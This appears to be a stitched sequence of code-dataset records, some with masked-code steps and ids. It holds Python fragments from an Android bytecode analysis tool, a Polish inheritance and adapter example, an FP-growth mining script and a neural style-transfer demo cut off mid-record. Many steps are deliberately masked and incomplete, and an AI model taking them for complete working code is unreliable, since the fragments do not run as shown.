bb_color = CONF[\"COLORS\"][\"BB\"]\n normal_color = CONF[\"COLORS\"][\"NORMAL\"]\n print_fct = CONF[\"PRINT_FCT\"]\n\n colors = CONF[\"COLORS\"][\"OUTPUT\"]\n\n for i in basic_blocks:\n print_fct(\"%s%s%s : \\n\" % (bb_color, i.get_name(), normal_color))\n instructions = i.get_instructions()\n for ins in instructions:\n if nb in notes:\n for note in notes[nb]:\n _PrintNote(note, 1)\n\n print_fct(\"\\t%s%-3d%s(%s%08x%s) \" %\n (offset_color, nb, normal_color, offset_addr_color, idx,\n normal_color))\n print_fct(\"%s%-20s%s\" %\n (instruction_name_color, ins.get_name(), normal_color))\n\n operands = ins.get_operands()\n print_fct(\n \"%s\" %\n \", \".join(m_a.get_vm().colorize_operands(operands, colors)))\n\n op_value = ins.get_op_value()\n if ins == instructions[-1] and i.childs:\n print_fct(\" \")\n\n # packed/sparse-switch\n if (op_value == 0x2b or op_value == 0x2c) and len(i.childs) > 1:\n values = i.get_special_ins(idx).get_values()\n print_fct(\"%s[ D:%s%s \" %\n (branch_false_color, i.childs[0][2].get_name(),\n branch_color))\n print_fct(' '.join(\"%d:%s\" % (\n values[j], i.childs[j + 1][2].get_name()) for j in\n range(0, len(i.childs) - 1)) + \" ]%s\" %\n normal_color)\n else:\n if len(i.childs) == 2:\n print_fct(\"%s[ %s%s \" % (branch_false_color,\n i.childs[0][2].get_name(),\n branch_true_color))\n print_fct(' '.join(\"%s\" % c[2].get_name(\n ) for c in i.childs[1:]) + \" ]%s\" % normal_color)\n else:\n print_fct(\"%s[ \" % branch_color + ' '.join(\n \"%s\" % c[2].get_name() for c in i.childs) + \" ]%s\" %\n normal_color)\n\n idx += ins.get_length()\n nb += 1\n\n print_fct(\"\\n\")\n\n if i.get_exception_analysis():\n print_fct(\"\\t%s%s%s\\n\" %\n (exception_color, i.exception_analysis.show_buff(),\n normal_color))\n\n print_fct(\"\\n\")\n\n\nclass TmpBlock(object):\n\n def __init__(self, name):\n self.name = name\n\n def get_name(self):\n return self.name\n\n\ndef method2json(mx, directed_graph=False):\n if directed_graph:\n return method2json_direct(mx)\n return method2json_undirect(mx)\n\n\ndef method2json_undirect(mx):\n d = {}\n reports = []\n d[\"reports\"] = reports\n\n for DVMBasicMethodBlock in mx.basic_blocks.gets():\n cblock = {}\n\n cblock[\"BasicBlockId\"] = DVMBasicMethodBlock.get_name()\n cblock[\"registers\"] = mx.get_method().get_code().get_registers_size()\n cblock[\"instructions\"] = []\n\n ins_idx = DVMBasicMethodBlock.start\n for DVMBasicMethodBlockInstruction in DVMBasicMethodBlock.get_instructions(\n ):\n c_ins = {}\n c_ins[\"idx\"] = ins_idx\n c_ins[\"name\"] = DVMBasicMethodBlockInstruction.get_name()\n c_ins[\"operands\"] = DVMBasicMethodBlockInstruction.get_operands(\n ins_idx)\n\n cblock[\"instructions\"].append(c_ins)\n ins_idx += DVMBasicMethodBlockInstruction.get_length()\n\n cblock[\"Edge\"] = []\n for DVMBasicMethodBlockChild in DVMBasicMethodBlock.childs:\n cblock[\"Edge\"].append(DVMBasicMethodBlockChild[-1].get_name())\n\n reports.append(cblock)\n\n return json.dumps(d)\n\n\ndef method2json_direct(mx):\n d = {}\n reports = []\n d[\"reports\"] = reports\n\n hooks = {}\n\n l = []\n for DVMBasicMethodBlock in mx.basic_blocks.gets():\n for index, DVMBasicMethodBlockChild in enumerate(\n DVMBasicMethodBlock.childs):\n if DVMBasicMethodBlock.get_name(\n ) == DVMBasicMethodBlockChild[-1].get_name():\n\n preblock = TmpBlock(DVMBasicMethodBlock.get_name() + \"-pre\")\n\n cnblock = {}\n cnblock[\"BasicBlockId\"] = DVMBasicMethodBlock.get_name(\n ) + \"-pre\"\n cnblock[\"start\"] = DVMBasicMethodBlock.start\n cnblock[\"notes\"] = []\n\n cnblock[\"Edge\"] = [DVMBasicMethodBlock.get_name()]\n cnblock[\"registers\"] = 0\n cnblock[\"instructions\"] = []\n cnblock[\"info_bb\"] = 0\n\n l.append(cnblock)\n\n for parent in DVMBasicMethodBlock.fathers:\n hooks[parent[-1].get_name()] = []\n hooks[parent[-1].get_name()].append(preblock)\n\n for idx, child in enumerate(parent[-1].childs):\n if child[-1].get_name() == DVMBasicMethodBlock.get_name(\n ):\n hooks[parent[-1].get_name()].append(child[-1])\n\n for DVMBasicMethodBlock in mx.basic_blocks.gets():\n cblock = {}\n\n cblock[\"BasicBlockId\"] = DVMBasicMethodBlock.get_name()\n cblock[\"start\"] = DVMBasicMethodBlock.start\n cblock[\"notes\"] = DVMBasicMethodBlock.get_notes()\n\n cblock[\"registers\"] = mx.get_method().get_code().get_registers_size()\n cblock[\"instructions\"] = []\n\n ins_idx = DVMBasicMethodBlock.start\n last_instru = None\n for DVMBasicMethodBlockInstruction in DVMBasicMethodBlock.get_instructions(\n ):\n c_ins = {}\n c_ins[\"idx\"] = ins_idx\n c_ins[\"name\"] = DVMBasicMethodBlockInstruction.get_name()\n c_ins[\"operands\"] = DVMBasicMethodBlockInstruction.get_operands(\n ins_idx)\n\n c_ins[\"formatted_operands\"\n ] = DVMBasicMethodBlockInstruction.get_formatted_operands()\n\n cblock[\"instructions\"].append(c_ins)\n\n if (DVMBasicMethodBlockInstruction.get_op_value() == 0x2b or\n DVMBasicMethodBlockInstruction.get_op_value() == 0x2c):\n values = DVMBasicMethodBlock.get_special_ins(ins_idx)\n cblock[\"info_next\"] = values.get_values()\n\n ins_idx += DVMBasicMethodBlockInstruction.get_length()\n last_instru = DVMBasicMethodBlockInstruction\n\n cblock[\"info_bb\"] = 0\n if DVMBasicMethodBlock.childs:\n if len(DVMBasicMethodBlock.childs) > 1:\n cblock[\"info_bb\"] = 1\n\n if (last_instru.get_op_value() == 0x2b or\n last_instru.get_op_value() == 0x2c):\n cblock[\"info_bb\"] = 2\n\n cblock[\"Edge\"] = []\n for DVMBasicMethodBlockChild in DVMBasicMethodBlock.childs:\n ok = False\n if DVMBasicMethodBlock.get_name() in hooks:\n if DVMBasicMethodBlockChild[-1] in hooks[\n DVMBasicMethodBlock.get_name()\n ]:\n ok = True\n cblock[\"Edge\"].append(hooks[DVMBasicMethodBlock.get_name(\n )][0].get_name())\n\n if not ok:\n cblock[\"Edge\"].append(DVMBasicMethodBlockChild[-1].get_name())\n\n exception_analysis = DVMBasicMethodBlock.get_exception_analysis()\n if exception_analysis:\n cblock[\"Exceptions\"] = exception_analysis.get()\n\n reports.append(cblock)\n\n reports.extend(l)\n\n return json.dumps(d)\n\n\nclass SV(object):\n\n def __init__(self, size, buff):\n self.__size = size\n self.__value = unpack(self.__size, buff)[0]\n\n def _get(self):\n return pack(self.__size, self.__value)\n\n def __str__(self):\n return \"0x%x\" % self.__value\n\n def __int__(self):\n return self.__value\n\n def get_value_buff(self):\n return self._get()\n\n def get_value(self):\n return self.__value\n\n def set_value(self, attr):\n self.__value = attr\n\n\nclass SVs(object):\n\n def __init__(self, size, ntuple, buff):\n self.__size = size\n\n self.__value = ntuple._make(unpack(self.__size, buff))\n\n def _get(self):\n l = []\n for i in self.__value._fields:\n l.append(getattr(self.__value, i))\n return pack(self.__size, *l)\n\n def _export(self):\n return [x for x in self.__value._fields]\n\n def get_value_buff(self):\n return self._get()\n\n def get_value(self):\n return self.__value\n\n def set_value(self, attr):\n self.__value = self.__value._replace(**attr)\n\n def __str__(self):\n return self.__value.__str__()\n\n\ndef object_to_bytes(obj):\n \"\"\"\n Convert a object to a bytearray or call get_raw() of the object\n if no useful type was found.\n \"\"\"\n if isinstance(obj, str):\n return bytearray(obj, \"UTF-8\")\n elif isinstance(obj, bool):\n return bytearray()\n elif isinstance(obj, int):\n return pack(\"<L\", obj)\n elif obj == None:\n return bytearray()\n elif isinstance(obj, bytearray):\n return obj\n else:\n #print type(obj), obj\n return obj.get_raw()\n\n\nclass MethodBC(object):\n\n def show(self, value):\n getattr(self, \"show_\" + value)()\n\n\nclass BuffHandle(object):\n\n def __init__(self, buff):\n self.__buff = bytearray(buff)\n self.__idx = 0\n\n def size(self):\n return len(self.__buff)\n\n def set_idx(self, idx):\n self.__idx = idx\n\n def get_idx(self):\n return self.__idx\n\n def readNullString(self, size):\n data = self.read(size)\n return data\n\n def read_b(self, size):\n return self.__buff[self.__idx:self.__idx + size]\n\n def read_at(self, offset, size):\n return self.__buff[offset:offset + size]\n\n def read(self, size):\n if isinstance(size, SV):\n size = size.value\n\n buff = self.__buff[self.__idx:self.__idx + size]\n self.__idx += size\n\n return buff\n\n def end(self):\n return self.__idx == len(self.__buff)\n\n\nclass Buff(object):\n\n def __init__(self, offset, buff):\n self.offset = offset\n self.buff = buff\n\n self.size = len(buff)\n\n\nclass _Bytecode(object):\n\n def __init__(self, buff):\n self.__buff = bytearray(buff)\n self.__idx = 0\n\n def read(self, size):\n if isinstance(size, SV):\n size = size.value\n\n buff = self.__buff[self.__idx:self.__idx + size]\n self.__idx += size\n\n return buff\n\n def readat(self, off):\n if isinstance(off, SV):\n off = off.value\n\n return self.__buff[off:]\n\n def read_b(self, size):\n return self.__buff[self.__idx:self.__idx + size]\n\n def set_idx(self, idx):\n self.__idx = idx\n\n def get_idx(self):\n return self.__idx\n\n def add_idx(self, idx):\n self.__idx += idx\n\n def register(self, type_register, fct):\n self.__registers[type_register].append(fct)\n\n def get_buff(self):\n return self.__buff\n\n def length_buff(self):\n return len(self.__buff)\n\n def set_buff(self, buff):\n self.__buff = buff\n\n def save(self, filename):\n buff = self._save()\n with open(filename, \"wb\") as fd:\n fd.write(buff)\n\n\ndef FormatClassToJava(input):\n \"\"\"\n Transoform a typical xml format class into java format\n\n :param input: the input class name\n :rtype: string\n \"\"\"\n return \"L\" + input.replace(\".\", \"/\") + \";\"\n\n\ndef FormatClassToPython(input):\n i = input[:-1]\n i = i.replace(\"/\", \"_\")\n i = i.replace(\"$\", \"_\")\n\n return i\n\n\ndef FormatNameToPython(input):\n i = input.replace(\"<\", \"\")\n i = i.replace(\">\", \"\")\n i = i.replace(\"$\", \"_\")\n\n return i\n\n\ndef FormatDescriptorToPython(input):\n i = input.replace(\"/\", \"_\")\n i = i.replace(\";\", \"\")\n i = i.replace(\"[\", \"\")\n i = i.replace(\"(\", \"\")\n i = i.replace(\")\", \"\")\n i = i.replace(\" \", \"\")\n i = i.replace(\"$\", \"\")\n\n return i\n\n\nclass Node(object):\n\n def __init__(self, n, s):\n self.id = n\n self.title = s\n self.children = []\n",
"step-ids": [
35,
62,
63,
65,
71
]
}
|
[
35,
62,
63,
65,
71
] |
class Figura:
def __init__(self):
print("Tworze obiekt klasy Figura...")
def pobierz_polozenie(self):
print("Metoda pobierz_polozenie klasy Figura.")
def nadaj_polozenie(self):
print("Metoda nadaj_polozenie klasy Figura.")
def wyswietl(self):
print("Metoda wyswietl klasy Figura.")
def wypelnij(self):
print("Metoda wypelnij klasy Figura.")
def nadaj_kolor(self):
print("Metoda nadaj_kolor klasy Figura.")
def usun(self):
print("Metoda usun klasy Figura.")
class Punkt(Figura):
def __init__(self):
print("Tworze obiekt klasy Punkt...")
def wyswietl(self):
print("Metoda wyswietl klasy Punkt.")
def wypelnij(self):
print("Metoda wypelnij klasy Punkt.")
def usun(self):
print("Metoda usun klasy Punkt.")
class Linia(Figura):
def __init__(self):
print("Tworze obiekt klasy Linia...")
def wyswietl(self):
print("Metoda wyswietl klasy Linia.")
def wypelnij(self):
print("Metoda wypelnij klasy Linia.")
def usun(self):
print("Metoda usun klasy Linia.")
class Kwadrat(Figura):
def __init__(self):
print("Tworze obiekt klasy Kwadrat...")
def wyswietl(self):
print("Metoda wyswietl klasy Kwadrat.")
def wypelnij(self):
print("Metoda wypelnij klasy Kwadrat.")
def usun(self):
print("Metoda usun klasy Kwadrat.")
class XXOkrag:
def __init__(self):
print("Tworze obiekt klasy XXOkrag...")
def wyswietlaj(self):
print("Metoda wyswietlaj klasy XXOkrag.")
def wypelniaj(self):
print("Metoda wypelniaj klasy XXOkrag.")
def usuwaj(self):
print("Metoda usuwaj klasy XXOkrag.")
def pobierz_polozenie(self):
print("Metoda pobierz_polozenie klasy XXOkrag.")
def nadaj_polozenie(self):
print("Metoda nadaj_polozenie klasy XXOkrag.")
def ustaw_kolor(self):
print("Metoda ustaw_kolor klasy XXOkrag.")
class Okrag(Figura):
def __init__(self):
self.xokrag = XXOkrag()
def pobierz_polozenie(self):
self.xokrag.pobierz_polozenie()
def nadaj_polozenie(self):
self.xokrag.nadaj_polozenie()
def wyswietl(self):
self.xokrag.wyswietlaj()
def wypelnij(self):
self.xokrag.wypelniaj()
def nadaj_kolor(self):
self.xokrag.ustaw_kolor()
def usun(self):
self.xokrag.usuwaj()
if __name__ == "__main__":
lista_figur = [Linia(), Kwadrat(), Okrag()]
for fig in lista_figur:
fig.wyswietl()
|
normal
|
{
"blob_id": "774bf2b49f6e546f16294edc17e9ac34fa8a9ba8",
"index": 2711,
"step-1": "<mask token>\n\n\nclass Punkt(Figura):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Linia(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Linia...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Linia.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Linia.')\n\n def usun(self):\n print('Metoda usun klasy Linia.')\n\n\nclass Kwadrat(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Kwadrat...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Kwadrat.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Kwadrat.')\n\n def usun(self):\n print('Metoda usun klasy Kwadrat.')\n\n\nclass XXOkrag:\n\n def __init__(self):\n print('Tworze obiekt klasy XXOkrag...')\n\n def wyswietlaj(self):\n print('Metoda wyswietlaj klasy XXOkrag.')\n\n def wypelniaj(self):\n print('Metoda wypelniaj klasy XXOkrag.')\n\n def usuwaj(self):\n print('Metoda usuwaj klasy XXOkrag.')\n\n def pobierz_polozenie(self):\n print('Metoda pobierz_polozenie klasy XXOkrag.')\n\n def nadaj_polozenie(self):\n print('Metoda nadaj_polozenie klasy XXOkrag.')\n\n def ustaw_kolor(self):\n print('Metoda ustaw_kolor klasy XXOkrag.')\n\n\nclass Okrag(Figura):\n\n def __init__(self):\n self.xokrag = XXOkrag()\n\n def pobierz_polozenie(self):\n self.xokrag.pobierz_polozenie()\n\n def nadaj_polozenie(self):\n self.xokrag.nadaj_polozenie()\n\n def wyswietl(self):\n self.xokrag.wyswietlaj()\n\n def wypelnij(self):\n self.xokrag.wypelniaj()\n\n def nadaj_kolor(self):\n self.xokrag.ustaw_kolor()\n\n def usun(self):\n self.xokrag.usuwaj()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Punkt(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Punkt...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Punkt.')\n <mask token>\n\n def usun(self):\n print('Metoda usun klasy Punkt.')\n\n\nclass Linia(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Linia...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Linia.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Linia.')\n\n def usun(self):\n print('Metoda usun klasy Linia.')\n\n\nclass Kwadrat(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Kwadrat...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Kwadrat.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Kwadrat.')\n\n def usun(self):\n print('Metoda usun klasy Kwadrat.')\n\n\nclass XXOkrag:\n\n def __init__(self):\n print('Tworze obiekt klasy XXOkrag...')\n\n def wyswietlaj(self):\n print('Metoda wyswietlaj klasy XXOkrag.')\n\n def wypelniaj(self):\n print('Metoda wypelniaj klasy XXOkrag.')\n\n def usuwaj(self):\n print('Metoda usuwaj klasy XXOkrag.')\n\n def pobierz_polozenie(self):\n print('Metoda pobierz_polozenie klasy XXOkrag.')\n\n def nadaj_polozenie(self):\n print('Metoda nadaj_polozenie klasy XXOkrag.')\n\n def ustaw_kolor(self):\n print('Metoda ustaw_kolor klasy XXOkrag.')\n\n\nclass Okrag(Figura):\n\n def __init__(self):\n self.xokrag = XXOkrag()\n\n def pobierz_polozenie(self):\n self.xokrag.pobierz_polozenie()\n\n def nadaj_polozenie(self):\n self.xokrag.nadaj_polozenie()\n\n def wyswietl(self):\n self.xokrag.wyswietlaj()\n\n def wypelnij(self):\n self.xokrag.wypelniaj()\n\n def nadaj_kolor(self):\n self.xokrag.ustaw_kolor()\n\n def usun(self):\n self.xokrag.usuwaj()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Punkt(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Punkt...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Punkt.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Punkt.')\n\n def usun(self):\n print('Metoda usun klasy Punkt.')\n\n\nclass Linia(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Linia...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Linia.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Linia.')\n\n def usun(self):\n print('Metoda usun klasy Linia.')\n\n\nclass Kwadrat(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Kwadrat...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Kwadrat.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Kwadrat.')\n\n def usun(self):\n print('Metoda usun klasy Kwadrat.')\n\n\nclass XXOkrag:\n\n def __init__(self):\n print('Tworze obiekt klasy XXOkrag...')\n\n def wyswietlaj(self):\n print('Metoda wyswietlaj klasy XXOkrag.')\n\n def wypelniaj(self):\n print('Metoda wypelniaj klasy XXOkrag.')\n\n def usuwaj(self):\n print('Metoda usuwaj klasy XXOkrag.')\n\n def pobierz_polozenie(self):\n print('Metoda pobierz_polozenie klasy XXOkrag.')\n\n def nadaj_polozenie(self):\n print('Metoda nadaj_polozenie klasy XXOkrag.')\n\n def ustaw_kolor(self):\n print('Metoda ustaw_kolor klasy XXOkrag.')\n\n\nclass Okrag(Figura):\n\n def __init__(self):\n self.xokrag = XXOkrag()\n\n def pobierz_polozenie(self):\n self.xokrag.pobierz_polozenie()\n\n def nadaj_polozenie(self):\n self.xokrag.nadaj_polozenie()\n\n def wyswietl(self):\n self.xokrag.wyswietlaj()\n\n def wypelnij(self):\n self.xokrag.wypelniaj()\n\n def nadaj_kolor(self):\n self.xokrag.ustaw_kolor()\n\n def usun(self):\n self.xokrag.usuwaj()\n\n\n<mask token>\n",
"step-4": "class Figura:\n <mask token>\n\n def pobierz_polozenie(self):\n print('Metoda pobierz_polozenie klasy Figura.')\n <mask token>\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Figura.')\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Punkt(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Punkt...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Punkt.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Punkt.')\n\n def usun(self):\n print('Metoda usun klasy Punkt.')\n\n\nclass Linia(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Linia...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Linia.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Linia.')\n\n def usun(self):\n print('Metoda usun klasy Linia.')\n\n\nclass Kwadrat(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Kwadrat...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Kwadrat.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Kwadrat.')\n\n def usun(self):\n print('Metoda usun klasy Kwadrat.')\n\n\nclass XXOkrag:\n\n def __init__(self):\n print('Tworze obiekt klasy XXOkrag...')\n\n def wyswietlaj(self):\n print('Metoda wyswietlaj klasy XXOkrag.')\n\n def wypelniaj(self):\n print('Metoda wypelniaj klasy XXOkrag.')\n\n def usuwaj(self):\n print('Metoda usuwaj klasy XXOkrag.')\n\n def pobierz_polozenie(self):\n print('Metoda pobierz_polozenie klasy XXOkrag.')\n\n def nadaj_polozenie(self):\n print('Metoda nadaj_polozenie klasy XXOkrag.')\n\n def ustaw_kolor(self):\n print('Metoda ustaw_kolor klasy XXOkrag.')\n\n\nclass Okrag(Figura):\n\n def __init__(self):\n self.xokrag = XXOkrag()\n\n def pobierz_polozenie(self):\n self.xokrag.pobierz_polozenie()\n\n def nadaj_polozenie(self):\n self.xokrag.nadaj_polozenie()\n\n def wyswietl(self):\n self.xokrag.wyswietlaj()\n\n def wypelnij(self):\n self.xokrag.wypelniaj()\n\n def nadaj_kolor(self):\n self.xokrag.ustaw_kolor()\n\n def usun(self):\n self.xokrag.usuwaj()\n\n\n<mask token>\n",
"step-5": "class Figura:\n def __init__(self):\n print(\"Tworze obiekt klasy Figura...\")\n def pobierz_polozenie(self):\n print(\"Metoda pobierz_polozenie klasy Figura.\")\n def nadaj_polozenie(self):\n print(\"Metoda nadaj_polozenie klasy Figura.\")\n def wyswietl(self):\n print(\"Metoda wyswietl klasy Figura.\")\n def wypelnij(self):\n print(\"Metoda wypelnij klasy Figura.\")\n def nadaj_kolor(self):\n print(\"Metoda nadaj_kolor klasy Figura.\")\n def usun(self):\n print(\"Metoda usun klasy Figura.\")\n\nclass Punkt(Figura):\n def __init__(self):\n print(\"Tworze obiekt klasy Punkt...\")\n def wyswietl(self):\n print(\"Metoda wyswietl klasy Punkt.\")\n def wypelnij(self):\n print(\"Metoda wypelnij klasy Punkt.\")\n def usun(self):\n print(\"Metoda usun klasy Punkt.\")\n\nclass Linia(Figura):\n def __init__(self):\n print(\"Tworze obiekt klasy Linia...\")\n def wyswietl(self):\n print(\"Metoda wyswietl klasy Linia.\")\n def wypelnij(self):\n print(\"Metoda wypelnij klasy Linia.\")\n def usun(self):\n print(\"Metoda usun klasy Linia.\")\n\nclass Kwadrat(Figura):\n def __init__(self):\n print(\"Tworze obiekt klasy Kwadrat...\")\n def wyswietl(self):\n print(\"Metoda wyswietl klasy Kwadrat.\")\n def wypelnij(self):\n print(\"Metoda wypelnij klasy Kwadrat.\")\n def usun(self):\n print(\"Metoda usun klasy Kwadrat.\")\n\nclass XXOkrag:\n def __init__(self):\n print(\"Tworze obiekt klasy XXOkrag...\")\n def wyswietlaj(self):\n print(\"Metoda wyswietlaj klasy XXOkrag.\")\n def wypelniaj(self):\n print(\"Metoda wypelniaj klasy XXOkrag.\")\n def usuwaj(self):\n print(\"Metoda usuwaj klasy XXOkrag.\")\n def pobierz_polozenie(self):\n print(\"Metoda pobierz_polozenie klasy XXOkrag.\")\n def nadaj_polozenie(self):\n print(\"Metoda nadaj_polozenie klasy XXOkrag.\")\n def ustaw_kolor(self):\n print(\"Metoda ustaw_kolor klasy XXOkrag.\")\n\nclass Okrag(Figura):\n def __init__(self):\n self.xokrag = XXOkrag()\n def pobierz_polozenie(self):\n self.xokrag.pobierz_polozenie()\n def nadaj_polozenie(self):\n self.xokrag.nadaj_polozenie()\n def wyswietl(self):\n self.xokrag.wyswietlaj()\n def wypelnij(self):\n self.xokrag.wypelniaj()\n def nadaj_kolor(self):\n self.xokrag.ustaw_kolor()\n def usun(self):\n self.xokrag.usuwaj()\n\nif __name__ == \"__main__\":\n\n lista_figur = [Linia(), Kwadrat(), Okrag()]\n\n for fig in lista_figur:\n fig.wyswietl()\n",
"step-ids": [
27,
30,
31,
34,
41
]
}
|
[
27,
30,
31,
34,
41
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
fp_growth.minTree(myFPtree, myHeaderTab, 100000, set([]), myFreqList)
print(len(myFreqList))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
parsedDat = [line.split() for line in open('kosarak.dat').readlines()]
initSet = fp_growth.createInitSet(parsedDat)
myFPtree, myHeaderTab = fp_growth.createTree(initSet, 100000)
myFreqList = []
fp_growth.minTree(myFPtree, myHeaderTab, 100000, set([]), myFreqList)
print(len(myFreqList))
<|reserved_special_token_1|>
from numpy import *
import fp_growth
<|reserved_special_token_0|>
parsedDat = [line.split() for line in open('kosarak.dat').readlines()]
initSet = fp_growth.createInitSet(parsedDat)
myFPtree, myHeaderTab = fp_growth.createTree(initSet, 100000)
myFreqList = []
fp_growth.minTree(myFPtree, myHeaderTab, 100000, set([]), myFreqList)
print(len(myFreqList))
<|reserved_special_token_1|>
# coding=gbk
from numpy import *
import fp_growth
'''
#创建树的一个单节点
rootNode=fp_growth.treeNode('pyramid',9,None)
#为其增加一个子节点
rootNode.children['eye']=fp_growth.treeNode('eye',13,None)
rootNode.disp()
#导入事务数据库实例
simpData=fp_growth.loadSimpData()
#print("simpData:")
#print(simpData)
#对数据进行格式化处理
initSet=fp_growth.createInitSet(simpData)
#print("initSet:")
#print(initSet)
myFPtree,myHeaderTab=fp_growth.createTree(initSet,3)
#print("myFPtree:")
#print(myFPtree)
#myFPtree.disp()
print("myFPtree:")
#print(myFPtree)
myFPtree.disp()
print("myHeaderTab:")
for item in myHeaderTab.items():
print(item)
path=fp_growth.findPrefixPath('r',myHeaderTab['r'][1])
print("path:")
print(path)
#建立一个空列表来存储所有的频繁项集
freqItems=[]
fp_growth.minTree(myFPtree,myHeaderTab,3,set([]),freqItems)
'''
parsedDat=[line.split() for line in open('kosarak.dat').readlines()]
initSet=fp_growth.createInitSet(parsedDat)
myFPtree,myHeaderTab=fp_growth.createTree(initSet,100000)
myFreqList=[]
fp_growth.minTree(myFPtree,myHeaderTab,100000,set([]),myFreqList)
print(len(myFreqList))
|
flexible
|
{
"blob_id": "e8b0e6e5e68933703e2ac8c9b2b62d68c0c2f53d",
"index": 8295,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfp_growth.minTree(myFPtree, myHeaderTab, 100000, set([]), myFreqList)\nprint(len(myFreqList))\n",
"step-3": "<mask token>\nparsedDat = [line.split() for line in open('kosarak.dat').readlines()]\ninitSet = fp_growth.createInitSet(parsedDat)\nmyFPtree, myHeaderTab = fp_growth.createTree(initSet, 100000)\nmyFreqList = []\nfp_growth.minTree(myFPtree, myHeaderTab, 100000, set([]), myFreqList)\nprint(len(myFreqList))\n",
"step-4": "from numpy import *\nimport fp_growth\n<mask token>\nparsedDat = [line.split() for line in open('kosarak.dat').readlines()]\ninitSet = fp_growth.createInitSet(parsedDat)\nmyFPtree, myHeaderTab = fp_growth.createTree(initSet, 100000)\nmyFreqList = []\nfp_growth.minTree(myFPtree, myHeaderTab, 100000, set([]), myFreqList)\nprint(len(myFreqList))\n",
"step-5": "# coding=gbk\nfrom numpy import *\n\nimport fp_growth\n\n\n'''\n#创建树的一个单节点\nrootNode=fp_growth.treeNode('pyramid',9,None)\n#为其增加一个子节点\nrootNode.children['eye']=fp_growth.treeNode('eye',13,None)\n\nrootNode.disp()\n\n\n\n#导入事务数据库实例\nsimpData=fp_growth.loadSimpData()\n#print(\"simpData:\")\n#print(simpData)\n\n#对数据进行格式化处理\ninitSet=fp_growth.createInitSet(simpData)\n#print(\"initSet:\")\n#print(initSet)\n\nmyFPtree,myHeaderTab=fp_growth.createTree(initSet,3)\n\n#print(\"myFPtree:\")\n#print(myFPtree)\n#myFPtree.disp()\n\nprint(\"myFPtree:\")\n#print(myFPtree)\nmyFPtree.disp()\n\n\nprint(\"myHeaderTab:\")\nfor item in myHeaderTab.items():\n\tprint(item)\n\t\npath=fp_growth.findPrefixPath('r',myHeaderTab['r'][1])\nprint(\"path:\")\t\nprint(path)\n\n#建立一个空列表来存储所有的频繁项集\nfreqItems=[]\nfp_growth.minTree(myFPtree,myHeaderTab,3,set([]),freqItems)\n\n\n'''\n\nparsedDat=[line.split() for line in open('kosarak.dat').readlines()]\ninitSet=fp_growth.createInitSet(parsedDat)\nmyFPtree,myHeaderTab=fp_growth.createTree(initSet,100000)\nmyFreqList=[]\nfp_growth.minTree(myFPtree,myHeaderTab,100000,set([]),myFreqList)\nprint(len(myFreqList))\n\n\n\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Demo - train the decoders & use them to stylize image
from __future__ import print_function
from train import train
from infer import stylize
from utils import list_images
IS_TRAINING = True
# for training
TRAINING_IMGS_PATH = 'MS_COCO'
ENCODER_WEIGHTS_PATH = 'vgg19_normalised.npz'
MODEL_SAVE_PATH = 'models/autoencoder'
MODEL_SAVE_SUFFIX = '-done'
DEBUG = True
LOGGING_PERIOD = 10
AUTUENCODER_LEVELS_TRAIN = [5, 4, 3, 2, 1]
# for inferring (stylize)
CONTENTS_DIR = 'images/content'
STYLES_DIR = 'images/style'
OUTPUT_DIR = 'outputs'
STYLE_RATIO = 0.8
REPEAT_PIPELINE = 1
AUTUENCODER_LEVELS_INFER = [3, 2, 1]
def main():
if IS_TRAINING:
training_imgs_paths = list_images(TRAINING_IMGS_PATH)
train(training_imgs_paths,
ENCODER_WEIGHTS_PATH,
MODEL_SAVE_PATH,
autoencoder_levels=AUTUENCODER_LEVELS_TRAIN,
debug=DEBUG,
logging_period=LOGGING_PERIOD)
print('\n>>>>>> Successfully done training...\n')
else:
contents_path = list_images(CONTENTS_DIR)
styles_path = list_images(STYLES_DIR)
model_path = MODEL_SAVE_PATH + MODEL_SAVE_SUFFIX
stylize(contents_path,
styles_path,
OUTPUT_DIR,
ENCODER_WEIGHTS_PATH,
model_path,
style_ratio=STYLE_RATIO,
repeat_pipeline=REPEAT_PIPELINE,
autoencoder_levels=AUTUENCODER_LEVELS_INFER)
print('\n>>>>>> Successfully done stylizing...\n')
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "31ed798118f20005b5a26bc1fc0053b7d0a95657",
